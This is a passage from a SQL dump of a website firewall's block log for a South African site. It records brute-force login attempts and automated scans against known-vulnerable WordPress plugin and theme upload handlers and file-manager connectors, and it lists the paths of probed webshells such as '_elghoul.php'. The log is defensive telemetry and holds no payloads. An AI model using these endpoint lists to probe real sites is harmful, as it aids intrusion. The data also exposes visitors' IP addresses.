18:22:19','72.39.119.211','https://smithandsmith.co.za/wp-login.php','404shield',''),(4409,'2021-08-09 18:22:59','72.39.119.211','http://smithandsmith.co.za/administrator/','adminpw',''),(4410,'2021-08-10 04:20:58','23.228.109.147','https://smithandsmith.co.za/wp-login.php','404shield',''),(4411,'2021-08-10 09:56:00','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/advanced_file_manager_5/files/_elghoul.php?0=UP','404shield',''),(4412,'2021-08-10 09:56:00','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/advanced_file_manager_5/files/_elghoul.php?0=UP','404shield',''),(4413,'2021-08-10 12:06:38','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/advanced_file_manager_5/files/_elghoul.php?0=UP','404shield',''),(4414,'2021-08-10 23:56:50','213.149.103.132','https://smithandsmith.co.za/wp-login.php','404shield',''),(4415,'2021-08-10 23:56:50','213.149.103.132','https://smithandsmith.co.za/wp-login.php','404shield',''),(4416,'2021-08-11 08:30:13','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/manage-maps.php','404shield',''),(4417,'2021-08-11 17:04:52','104.198.172.68','https://smithandsmith.co.za/wp-login.php','404shield',''),(4418,'2021-08-11 18:10:33','164.90.187.127','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4419,'2021-08-12 01:07:43','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/superstorefinder-wp/css/ssf-wp-pop.css','404shield',''),(4420,'2021-08-12 06:59:49','46.101.95.65','https://smithandsmith.co.za/wp-login.php','404shield',''),(4421,'2021-08-12 08:46:56','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/super-interactive-maps/sim-wp-admin/wp-upload-class.csv.php','404shield',''),(4422,'2021-08-12 12:30:38','46.101.16.229','http://www.smithandsmith.co.za/','muashield',''),(4423,'2021-08-12 12:30:39','46.101.16.229','http://www.smithandsmith.co.za/','muashield',''),(4424,'2021-08-12 12:30:43','46.101.16.229','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(4425,'2021-08-12 15:44:31','103.118.27.88','https://smithandsmith.co.za/wp-login.php','404shield',''),(4426,'2021-08-12 19:34:29','159.65.65.170','https://smithandsmith.co.za/wp-login.php','404shield',''),(4427,'2021-08-12 20:07:32','144.217.174.169','https://smithandsmith.co.za/wp-content/plugins/iva-business-hours-pro/assets/fontello/LICENSE.txt','404shield',''),(4428,'2021-08-13 00:38:02','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/import.php','404shield',''),(4429,'2021-08-13 03:17:40','143.244.188.129','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(4430,'2021-08-13 03:18:34','143.244.188.129','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4431,'2021-08-13 12:28:53','197.29.31.100','http://www.smithandsmith.co.za/','muashield',''),(4432,'2021-08-13 12:28:53','197.29.31.100','http://www.smithandsmith.co.za/','muashield',''),(4433,'2021-08-13 12:29:01','197.29.31.100','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(4434,'2021-08-13 14:17:00','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php','404shield',''),(4435,'2021-08-13 17:11:21','185.248.100.56','https://smithandsmith.co.za/wp-login.php','404shield',''),(4436,'2021-08-13 21:26:38','37.0.11.66','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4437,'2021-08-13 23:14:07','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/pages/exportAjax.php','404shield',''),(4438,'2021-08-14 06:58:05','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/pages/import.php','404shield',''),(4439,'2021-08-14 14:28:11','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/super-interactive-maps/sim-wp-admin/dacai.csv.php','404shield',''),(4440,'2021-08-14 19:13:02','81.17.22.52','https://smithandsmith.co.za/wp-login.php','404shield',''),(4441,'2021-08-14 19:13:07','81.17.22.52','https://smithandsmith.co.za/wp-login.php','404shield',''),(4442,'2021-08-14 19:13:12','81.17.22.52','https://smithandsmith.co.za/wp-login.php','404shield',''),(4443,'2021-08-15 01:16:16','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/SSF_WP_UPLOADS_PATH/csv/import/dacai.csv.php','404shield',''),(4444,'2021-08-15 02:22:27','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/nforms/file-upload/server/php/index.php?file=tf2rghf.jpg','404shield',''),(4445,'2021-08-15 02:35:32','103.85.22.191','https://smithandsmith.co.za/wp-content/plugins/iva-business-hours-pro/assets/fontello/LICENSE.txt','404shield',''),(4446,'2021-08-15 09:26:12','185.220.102.244','https://smithandsmith.co.za/wp-login.php','404shield',''),(4447,'2021-08-15 09:26:15','185.220.102.244','https://smithandsmith.co.za/wp-login.php','404shield',''),(4448,'2021-08-15 09:26:18','185.220.102.244','https://smithandsmith.co.za/wp-login.php','404shield',''),(4449,'2021-08-15 12:49:50','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php','404shield',''),(4450,'2021-08-15 23:23:56','149.202.8.66','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4451,'2021-08-16 01:07:10','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/super-forms/uploads/php/index.php?file=tf2rghf.jpg','404shield',''),(4452,'2021-08-16 13:20:28','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/SqueezeTheme/style.css','404shield',''),(4453,'2021-08-16 14:36:51','143.244.188.129','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(4454,'2021-08-16 15:53:30','139.59.73.212','https://smithandsmith.co.za/wp-login.php','404shield',''),(4455,'2021-08-16 15:53:30','139.59.73.212','https://smithandsmith.co.za/wp-login.php','404shield',''),(4456,'2021-08-16 19:35:10','203.159.80.220','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4457,'2021-08-17 01:32:34','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/OptimizePress/lib/admin/media-upload.php','404shield',''),(4458,'2021-08-17 04:53:12','5.199.138.97','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4459,'2021-08-17 14:49:05','179.108.192.148','https://smithandsmith.co.za/wp-login.php','404shield',''),(4460,'2021-08-17 17:46:59','185.220.101.13','https://smithandsmith.co.za/wp-login.php','404shield',''),(4461,'2021-08-17 17:47:02','185.220.101.13','https://smithandsmith.co.za/wp-login.php','404shield',''),(4462,'2021-08-17 17:47:04','185.220.101.13','https://smithandsmith.co.za/wp-login.php','404shield',''),(4463,'2021-08-17 19:16:10','185.220.100.241','https://smithandsmith.co.za/wp-login.php','404shield',''),(4464,'2021-08-17 19:16:13','185.220.100.241','https://smithandsmith.co.za/wp-login.php','404shield',''),(4465,'2021-08-17 19:16:15','185.220.100.241','https://smithandsmith.co.za/wp-login.php','404shield',''),(4466,'2021-08-18 01:13:21','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/optimizepress/lib/admin/media-upload.php','404shield',''),(4467,'2021-08-18 08:58:24','124.217.255.60','https://smithandsmith.co.za/wp-login.php','404shield',''),(4468,'2021-08-18 13:24:46','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/konzept/includes/uploadify/upload.php','404shield',''),(4469,'2021-08-19 01:40:45','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/konzept/style.css','404shield',''),(4470,'2021-08-19 01:45:23','118.24.14.106','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4471,'2021-08-19 12:19:44','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/qualifire/style.css','404shield',''),(4472,'2021-08-19 17:42:20','213.149.103.132','https://smithandsmith.co.za/wp-login.php','404shield',''),(4473,'2021-08-19 17:42:20','213.149.103.132','https://smithandsmith.co.za/wp-login.php','404shield',''),(4474,'2021-08-19 22:45:50','66.230.230.230','https://smithandsmith.co.za/wp-login.php','404shield',''),(4475,'2021-08-19 22:45:54','66.230.230.230','https://smithandsmith.co.za/wp-login.php','404shield',''),(4476,'2021-08-19 22:45:58','66.230.230.230','https://smithandsmith.co.za/wp-login.php','404shield',''),(4477,'2021-08-19 23:51:05','51.15.16.15','https://smithandsmith.co.za/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php','404shield',''),(4478,'2021-08-19 23:51:08','51.15.16.15','https://smithandsmith.co.za/wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/pages/import.php','404shield',''),(4479,'2021-08-19 23:51:09','51.15.16.15','https://smithandsmith.co.za/wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/import.php','404shield',''),(4480,'2021-08-20 00:45:32','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/Famous/megaframe/megapanel/inc/functions.php','404shield',''),(4481,'2021-08-20 01:10:11','5.188.62.76','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4482,'2021-08-21 00:55:24','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/ucm-files-manager-ucm-fm/vendor/php/connector.minimal.php','404shield',''),(4483,'2021-08-21 00:55:40','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/softdiscover-db-file-manager/libraries/elfinder/php/connector.minimal.php','404shield',''),(4484,'2021-08-21 02:16:36','23.129.64.142','http://smithandsmith.co.za/wp-login.php','httpbl',''),(4485,'2021-08-21 02:16:39','23.129.64.142','http://smithandsmith.co.za/wp-login.php','httpbl',''),(4486,'2021-08-21 02:16:42','23.129.64.142','http://smithandsmith.co.za/wp-login.php','httpbl',''),(4487,'2021-08-21 03:32:21','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php','404shield',''),(4488,'2021-08-21 12:50:48','105.185.158.151','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4489,'2021-08-21 17:16:18','81.219.18.20','https://smithandsmith.co.za/wp-login.php','404shield',''),(4490,'2021-08-22 01:48:19','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/deep-blue/megaframe/megapanel/inc/functions.php','404shield',''),(4491,'2021-08-22 13:35:10','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/kiddo/style.css','404shield',''),(4492,'2021-08-23 01:27:10','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/clockstone/style.css','404shield',''),(4493,'2021-08-23 02:44:05','186.64.119.15','https://smithandsmith.co.za/wp-login.php','404shield',''),(4494,'2021-08-23 02:44:05','186.64.119.15','https://smithandsmith.co.za/wp-login.php','404shield',''),(4495,'2021-08-23 11:36:19','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php','404shield',''),(4496,'2021-08-23 18:28:08','31.177.95.27','https://smithandsmith.co.za/wp-login.php','404shield',''),(4497,'2021-08-23 18:28:14','31.177.95.27','https://smithandsmith.co.za/wp-login.php','404shield',''),(4498,'2021-08-24 02:02:27','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/cameleonthemeforest/includes/fileuploader/upload_handler.php','404shield',''),(4499,'2021-08-24 07:33:14','157.245.133.133','https://smithandsmith.co.za/wp-login.php','404shield',''),(4500,'2021-08-24 11:41:18','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php','404shield',''),(4501,'2021-08-24 17:08:59','184.168.126.206','https://smithandsmith.co.za/wp-login.php','404shield',''),(4502,'2021-08-25 01:22:19','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php','404shield',''),(4503,'2021-08-25 04:53:53','5.199.138.97','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4504,'2021-08-25 10:03:30','43.252.231.127','https://smithandsmith.co.za/wp-content/uploads/upload_index.php?auth=f02pz3831W0DTtLgq26L','404shield',''),(4505,'2021-08-25 12:56:23','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php','404shield',''),(4506,'2021-08-25 17:26:56','43.128.41.188','https://smithandsmith.co.za/wp-login.php','404shield',''),(4507,'2021-08-25 17:26:56','43.128.41.188','https://smithandsmith.co.za/wp-login.php','404shield',''),(4508,'2021-08-26 00:41:30','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/Nuance/functions/jwpanel/scripts/valums_uploader/php.php','404shield',''),(4509,'2021-08-26 13:19:20','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/switchblade/framework/_scripts/valums_uploader/php.php','404shield',''),(4510,'2021-08-26 16:13:59','203.159.80.102','https://smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(4511,'2021-08-26 16:14:26','203.159.80.102','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(4512,'2021-08-26 16:14:32','203.159.80.102','https://smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(4513,'2021-08-27 01:36:47','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php','404shield',''),(4514,'2021-08-27 03:11:55','134.209.190.224','https://smithandsmith.co.za/wp-login.php','404shield',''),(4515,'2021-08-27 03:11:55','134.209.190.224','https://smithandsmith.co.za/wp-login.php','404shield',''),(4516,'2021-08-27 13:09:44','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/photocrati-theme/admin/scripts/scripts-update.php','404shield',''),(4517,'2021-08-27 19:54:51','121.162.221.122','https://smithandsmith.co.za/wp-login.php','404shield',''),(4518,'2021-08-27 19:54:59','121.162.221.122','http://smithandsmith.co.za/administrator/','adminpw',''),(4519,'2021-08-28 00:27:34','188.124.42.105','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4520,'2021-08-28 00:27:34','188.124.42.105','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4521,'2021-08-28 00:27:34','188.124.42.105','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4522,'2021-08-28 00:52:39','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/photocrati-theme-v4.07/admin/scripts/scripts-update.php','404shield',''),(4523,'2021-08-28 13:15:38','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/photocrati-theme-v4/admin/scripts/scripts-update.php','404shield',''),(4524,'2021-08-28 17:04:06','3.26.60.148','https://www.smithandsmith.co.za/wp-content/plugins/upspy/index.php','404shield',''),(4525,'2021-08-28 17:04:13','3.26.60.148','https://www.smithandsmith.co.za/wp-content/plugins/ubh/index.php','404shield',''),(4526,'2021-08-28 17:04:23','3.26.60.148','https://www.smithandsmith.co.za/wp-content/plugins/vwcleanerplugin/bump.php?cache','404shield',''),(4527,'2021-08-28 18:46:07','3.26.60.148','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4528,'2021-08-28 18:46:08','3.26.60.148','http://www.smithandsmith.co.za/administrator/','adminpw',''),(4529,'2021-08-28 18:46:16','3.26.60.148','https://www.smithandsmith.co.za/wp-admin/setup-config.php','404shield',''),(4530,'2021-08-29 01:13:45','188.124.42.107','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4531,'2021-08-29 01:13:45','188.124.42.107','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4532,'2021-08-29 01:13:45','188.124.42.107','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4533,'2021-08-29 14:02:03','3.26.60.148','http://www.smithandsmith.co.za/','muashield',''),(4534,'2021-08-29 14:02:04','3.26.60.148','http://www.smithandsmith.co.za/','muashield',''),(4535,'2021-08-29 14:02:05','3.26.60.148','http://www.smithandsmith.co.za/','muashield',''),(4536,'2021-08-29 22:46:21','158.69.241.134','https://smithandsmith.co.za/wp-admin/install.php','404shield',''),(4537,'2021-08-29 22:46:21','158.69.241.134','https://smithandsmith.co.za/wp-login.php','404shield',''),(4538,'2021-08-30 01:29:29','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/photocrati-theme-v4/admin/scripts/scripts-update.php','404shield',''),(4539,'2021-08-30 02:04:47','37.0.11.216','https://www.smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(4540,'2021-08-30 02:05:17','37.0.11.216','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(4541,'2021-08-30 02:05:20','37.0.11.216','https://www.smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(4542,'2021-08-30 10:07:07','142.44.142.153','https://smithandsmith.co.za/wp-login.php','404shield',''),(4543,'2021-08-30 10:25:29','188.124.42.107','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4544,'2021-08-30 10:25:29','188.124.42.107','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4545,'2021-08-30 10:25:29','188.124.42.107','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4546,'2021-08-30 12:29:03','158.255.80.210','https://smithandsmith.co.za/wp-login.php','404shield',''),(4547,'2021-08-30 12:32:30','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/WPLocalPlaces/style.css','404shield',''),(4548,'2021-08-31 17:05:07','54.177.101.33','https://smithandsmith.co.za/wp-login.php','404shield',''),(4549,'2021-08-31 17:05:07','54.177.101.33','https://smithandsmith.co.za/wp-login.php','404shield',''),(4550,'2021-09-01 01:14:42','74.208.85.44','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(4551,'2021-09-01 03:51:55','188.124.42.107','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4552,'2021-09-01 03:51:55','188.124.42.107','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4553,'2021-09-01 03:51:55','188.124.42.107','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4554,'2021-09-01 04:39:22','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/DailyDeal/monetize/upload/upload.php','404shield',''),(4555,'2021-09-01 12:27:50','176.113.115.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(4556,'2021-09-01 12:27:50','176.113.115.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(4557,'2021-09-01 12:27:50','176.113.115.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(4558,'2021-09-01 14:31:33','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/MoneyTheme/uploads/upload.php','404shield',''),(4559,'2021-09-02 09:17:33','186.64.119.214','https://smithandsmith.co.za/wp-login.php','404shield',''),(4560,'2021-09-02 09:17:33','186.64.119.214','https://smithandsmith.co.za/wp-login.php','404shield',''),(4561,'2021-09-02 09:17:33','186.64.119.214','https://smithandsmith.co.za/wp-login.php','404shield',''),(4562,'2021-09-02 09:17:33','186.64.119.214','https://smithandsmith.co.za/wp-login.php','404shield',''),(4563,'2021-09-02 09:17:33','186.64.119.214','https://smithandsmith.co.za/wp-login.php','404shield',''),(4564,'2021-09-02 09:17:33','186.64.119.214','https://smithandsmith.co.za/wp-login.php','404shield',''),(4565,'2021-09-02 09:17:33','186.64.119.214','https://smithandsmith.co.za/wp-login.php','404shield',''),(4566,'2021-09-02 09:17:52','173.82.87.234','https://smithandsmith.co.za/wp-login.php','404shield',''),(4567,'2021-09-02 09:17:52','173.82.87.234','https://smithandsmith.co.za/wp-login.php','404shield',''),(4568,'2021-09-02 09:17:52','173.82.87.234','https://smithandsmith.co.za/wp-login.php','404shield',''),(4569,'2021-09-02 09:17:52','173.82.87.234','https://smithandsmith.co.za/wp-login.php','404shield',''),(4570,'2021-09-02 09:17:52','173.82.87.234','https://smithandsmith.co.za/wp-login.php','404shield',''),(4571,'2021-09-02 09:17:52','173.82.87.234','https://smithandsmith.co.za/wp-login.php','404shield',''),(4572,'2021-09-02 09:17:52','173.82.87.234','https://smithandsmith.co.za/wp-login.php','404shield',''),(4573,'2021-09-02 13:26:30','197.185.100.202','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4574,'2021-09-02 21:57:54','124.217.245.102','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4575,'2021-09-02 21:58:30','45.64.54.158','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4576,'2021-09-02 23:24:14','61.105.106.45','https://smithandsmith.co.za/wp-login.php','404shield',''),(4577,'2021-09-02 23:24:19','61.105.106.45','http://smithandsmith.co.za/administrator/','adminpw',''),(4578,'2021-09-03 01:47:49','5.188.62.76','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4579,'2021-09-03 01:52:22','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/theagency/includes/uploadify/uploadify.css','404shield',''),(4580,'2021-09-03 05:09:27','125.212.192.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(4581,'2021-09-03 13:31:35','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/elemin/themify/js/utils.js','404shield',''),(4582,'2021-09-03 15:52:28','131.72.236.108','https://smithandsmith.co.za/wp-login.php','404shield',''),(4583,'2021-09-04 01:14:02','37.0.10.159','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4584,'2021-09-04 01:57:27','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/elemin/themify/js/utils.js','404shield',''),(4585,'2021-09-04 21:20:33','167.99.12.47','https://smithandsmith.co.za/wp-login.php','404shield',''),(4586,'2021-09-05 00:43:28','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php','404shield',''),(4587,'2021-09-05 07:44:26','167.86.69.51','https://smithandsmith.co.za/wp-login.php','404shield',''),(4588,'2021-09-05 07:44:26','167.86.69.51','https://smithandsmith.co.za/wp-login.php','404shield',''),(4589,'2021-09-05 09:32:23','37.0.10.53','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4590,'2021-09-05 10:24:49','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.css','404shield',''),(4591,'2021-09-05 11:05:02','139.180.219.6','http://www.smithandsmith.co.za/','muashield',''),(4592,'2021-09-05 11:05:03','139.180.219.6','http://www.smithandsmith.co.za/','muashield',''),(4593,'2021-09-05 11:05:07','139.180.219.6','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(4594,'2021-09-05 23:37:13','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.css','404shield',''),(4595,'2021-09-06 10:30:58','164.160.119.49','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4596,'2021-09-06 12:34:44','5.34.179.50','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4597,'2021-09-06 12:34:46','5.34.179.50','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4598,'2021-09-06 12:34:48','5.34.179.50','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4599,'2021-09-06 13:20:02','52.221.206.93','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4600,'2021-09-06 15:21:59','5.34.179.50','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4601,'2021-09-06 15:22:01','5.34.179.50','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4602,'2021-09-06 15:22:03','5.34.179.50','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4603,'2021-09-06 18:28:37','5.34.179.50','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4604,'2021-09-06 18:28:39','5.34.179.50','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4605,'2021-09-06 18:28:40','5.34.179.50','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(4606,'2021-09-07 00:29:32','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/Brainstorm/functions/jwpanel/scripts/uploadify/uploadify.css','404shield',''),(4607,'2021-09-07 09:18:12','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.css','404shield',''),(4608,'2021-09-07 21:10:38','142.11.222.7','https://smithandsmith.co.za/wp-content/plugins/iva-business-hours-pro/assets/fontello/LICENSE.txt','404shield',''),(4609,'2021-09-08 00:51:42','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php','404shield',''),(4610,'2021-09-08 10:30:21','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/dp_evolve/js/back-end/libraries/fileuploader/upload_handler.php','404shield',''),(4611,'2021-09-08 11:10:56','103.127.30.241','https://smithandsmith.co.za/wp-login.php','404shield',''),(4612,'2021-09-08 19:36:18','197.185.97.28','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4613,'2021-09-08 21:52:39','105.156.73.86','http://www.smithandsmith.co.za/','muashield',''),(4614,'2021-09-08 21:52:40','105.156.73.86','http://www.smithandsmith.co.za/','muashield',''),(4615,'2021-09-08 21:52:45','105.156.73.86','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(4616,'2021-09-09 00:32:16','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/wp-avatar/admin/uploadify/uploadify.css','404shield',''),(4617,'2021-09-09 04:23:19','88.135.36.147','https://smithandsmith.co.za/wp-login.php','404shield',''),(4618,'2021-09-09 10:18:35','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/holding_pattern/admin/options-tab-sample.txt','404shield',''),(4619,'2021-09-09 21:03:59','62.84.114.100','https://smithandsmith.co.za/wp-login.php','404shield',''),(4620,'2021-09-09 21:40:12','62.84.114.100','https://smithandsmith.co.za/wp-login.php','404shield',''),(4621,'2021-09-09 21:49:55','62.84.114.100','https://smithandsmith.co.za/wp-login.php','404shield',''),(4622,'2021-09-10 02:05:39','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/satoshi/styles/functions.css','404shield',''),(4623,'2021-09-10 10:19:22','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/bordeaux-theme/style.css','404shield',''),(4624,'2021-09-10 14:00:13','178.154.240.173','https://smithandsmith.co.za/wp-login.php','404shield',''),(4625,'2021-09-10 14:50:37','178.154.240.173','https://smithandsmith.co.za/wp-login.php','404shield',''),(4626,'2021-09-10 16:14:50','178.154.240.173','https://smithandsmith.co.za/wp-login.php','404shield',''),(4627,'2021-09-10 21:05:31','20.150.142.191','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4628,'2021-09-11 01:00:22','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/bulteno-theme/functions/Readme!.txt','404shield',''),(4629,'2021-09-11 06:42:28','178.62.230.65','https://smithandsmith.co.za/wp-login.php','404shield',''),(4630,'2021-09-11 13:01:09','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/kernel-theme/style.css','404shield',''),(4631,'2021-09-11 17:12:33','37.0.10.46','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4632,'2021-09-11 17:55:17','27.124.127.178','https://smithandsmith.co.za/wp-login.php','404shield',''),(4633,'2021-09-12 01:39:36','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/oxygen-theme/style.css','404shield',''),(4634,'2021-09-12 12:40:27','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/piccione-theme/style.css','404shield',''),(4635,'2021-09-12 18:13:01','169.1.11.210','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4636,'2021-09-12 18:43:33','47.52.239.42','https://smithandsmith.co.za/wp-login.php','404shield',''),(4637,'2021-09-12 18:43:33','47.52.239.42','https://smithandsmith.co.za/wp-login.php','404shield',''),(4638,'2021-09-13 02:23:58','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/radial-theme/style.css','404shield',''),(4639,'2021-09-13 13:04:49','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/reganto-theme/style.css','404shield',''),(4640,'2021-09-13 22:39:44','167.71.214.42','https://smithandsmith.co.za/wp-content/plugins/','404shield',''),(4641,'2021-09-14 01:26:23','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/rockstar-theme/style.css','404shield',''),(4642,'2021-09-14 12:32:19','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/sportimo-theme/style.css','404shield',''),(4643,'2021-09-14 15:31:23','54.208.70.241','http://www.smithandsmith.co.za/','muashield',''),(4644,'2021-09-14 15:31:24','54.208.70.241','http://www.smithandsmith.co.za/','muashield',''),(4645,'2021-09-14 15:31:28','54.208.70.241','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(4646,'2021-09-14 17:47:27','27.124.127.178','https://smithandsmith.co.za/wp-login.php','404shield',''),(4647,'2021-09-15 00:44:01','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/anthology/style.css','404shield',''),(4648,'2021-09-15 14:17:56','164.160.119.50','https://smithandsmith.co.za/wp-login.php','404shield',''),(4649,'2021-09-15 20:57:51','167.99.157.88','https://smithandsmith.co.za/wp-login.php','404shield',''),(4650,'2021-09-15 20:57:51','167.99.157.88','https://smithandsmith.co.za/wp-login.php','404shield',''),(4651,'2021-09-16 01:27:23','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/Anthology/style.css','404shield',''),(4652,'2021-09-16 14:54:43','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/cubed_v1.2/style.css','404shield',''),(4653,'2021-09-16 15:22:07','103.81.87.29','https://smithandsmith.co.za/wp-login.php','404shield',''),(4654,'2021-09-16 18:45:28','176.112.192.25','https://smithandsmith.co.za/wp-login.php','404shield',''),(4655,'2021-09-17 00:26:23','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/cubed_v1.2/style.css','404shield',''),(4656,'2021-09-17 13:43:44','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/dandelion/style.css','404shield',''),(4657,'2021-09-17 